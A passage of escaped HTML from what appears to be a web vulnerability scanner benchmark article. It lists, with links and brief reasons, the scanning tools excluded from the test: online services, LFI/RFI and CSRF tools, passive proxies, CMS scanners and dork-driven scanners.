class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/php-injector/&quot;&gt;&lt;b&gt;&lt;i&gt;PHP-Injector&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.whiteacid.org/xss_assistant.user.js&quot;&gt;&lt;b&gt;XSS Assistant&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Fiddler &lt;/i&gt;&lt;/b&gt;&lt;a href=&quot;http://www.autosectools.com/Page/Fiddler-XSS-Inspector-Overview&quot;&gt;&lt;b&gt;&lt;i&gt;XSSInspector&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;/&lt;/i&gt;&lt;/b&gt;&lt;a href=&quot;http://sourceforge.net/projects/xsrfinspector/&quot;&gt;&lt;b&gt;&lt;i&gt;XSRFInspector&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; Plugins&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.gnucitizen.org/blog/javascript-xss-scanner/&quot;&gt;&lt;b&gt;GNUCitizen JAVASCRIPT XSS SCANNER&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;/b&gt;- since WebSecurify, a more advanced tool from the same vendor is already tested in the benchmark.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Vulnerability Scanner 1.0 (by cmiN, RST) &lt;/b&gt;- since the source code contained traces for remotely downloaded RFI lists from locations that do not exist anymore. &lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The benchmark focused on web application scanners that are able to detect either Reflected XSS or SQL Injection vulnerabilities, can be locally installed, and are also able to scan multiple URLs in the same execution.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;As a result, the test &lt;b&gt;did not include&lt;/b&gt; the following types of tools:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Online Scanning Services&lt;/u&gt; &lt;/b&gt;– Online applications that remotely scan applications, including (but not limited to) Appscan On Demand (IBM), Click To Secure, QualysGuard Web Application Scanning (Qualys), Sentinel (WhiteHat), Veracode (Veracode), VUPEN Web Application Security Scanner (VUPEN Security), WebInspect (online service - HP), WebScanService (Elanize KG), Gamascan (GAMASEC – currently offline), Cloud Penetrator (Secpoint), &amp;nbsp;Zero Day Scan, DomXSS Scanner, etc.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Scanners without RXSS / SQLi detection features&lt;/u&gt;&lt;/b&gt;&lt;u&gt;:&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/dominator/downloads/list&quot;&gt;&lt;b&gt;Dominator&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;/b&gt;(Firefox Plugin)&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/fimap/&quot;&gt;&lt;b&gt;fimap&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/lfimap/&quot;&gt;&lt;b&gt;lfimap&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/95146/phpbbrfi-scanner.txt&quot;&gt;&lt;b&gt;phpBB-RFI Scanner&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://dotdotpwn.sectester.net/&quot;&gt;&lt;b&gt;DotDotPawn&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/lfi/&quot;&gt;&lt;b&gt;LFI (Library-level Fault Injector)&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/97149/lfi_scanner.py.txt&quot;&gt;&lt;b&gt;lfi-scanner&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/102848/lfi-scanner-ver4.0.pl.txt&quot;&gt;&lt;b&gt;LFI-Scanner&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://dl.packetstormsecurity.net/UNIX/scanners/lfi-rfi2.txt&quot;&gt;&lt;b&gt;lfi-rfi2&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;LFI/RFI Checker (astalavista)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project&quot;&gt;&lt;b&gt;CSRF Tester&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Passive Scanners (response analysis without verification)&lt;/u&gt;&lt;/b&gt;&lt;u&gt;:&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://websecuritytool.codeplex.com/&quot;&gt;&lt;b&gt;Watcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt; (Fiddler Plugin by Casaba Security)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Category:OWASP_Skavenger_Project&quot;&gt;&lt;b&gt;Skavanger&lt;/b&gt;&lt;/a&gt;&lt;b&gt; (OWASP)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project&quot;&gt;&lt;b&gt;Pantera&lt;/b&gt;&lt;/a&gt;&lt;b&gt; (OWASP)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/ratproxy/&quot;&gt;&lt;b&gt;Ratproxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt; (Google)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.contextis.co.uk/resources/tools/cat/&quot;&gt;&lt;b&gt;CAT The Manual Application Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt; (Context)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Scanners of specific products or services (CMS scanners, Web Services Scanners, etc)&lt;/u&gt;&lt;/b&gt;&lt;u&gt;:&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;WSDigger&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Sprajax&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;ScanAjax&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Joomscan&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;wpscan&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Joomlascan&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Joomsq&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;WPSqli&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;u&gt;Web Application Scanning Tools which are using&lt;b&gt; Dynamic Runtime Analysis&lt;/b&gt;:&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;PuzlBox &lt;/b&gt;(the free version was removed from the web site, and is now sold as a commercial product named &lt;a href=&quot;http://www.autosectools.com/Software&quot;&gt;PHP Vulnerability Hunter&lt;/a&gt;)&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/inspathx/&quot;&gt;&lt;b&gt;Inspathx&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Uncontrollable Scanners&lt;/u&gt;&lt;/b&gt; - scanners that can’t be controlled or restricted to scan a single site, since they either receive the list of URLs to scan from Google Dork, or continue and scan external sites that are linked to the tested site. This list currently includes the following tools (and might include more):&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Darkjumper 5.8 &lt;/b&gt;(scans additional external hosts that are linked to the given tested host)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Bako&#39;s SQL Injection Scanner&lt;/b&gt; &lt;b&gt;2.2&lt;/b&gt; (only tests sites from a google dork)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Serverchk&lt;/b&gt; (only tests sites from a google dork)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72pt; text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;XSS Scanner &lt;/b&gt;by&lt;b&gt; Xylitol&lt;/b&gt; (only tests sites from a google dork)&lt;/div&gt;&lt;div 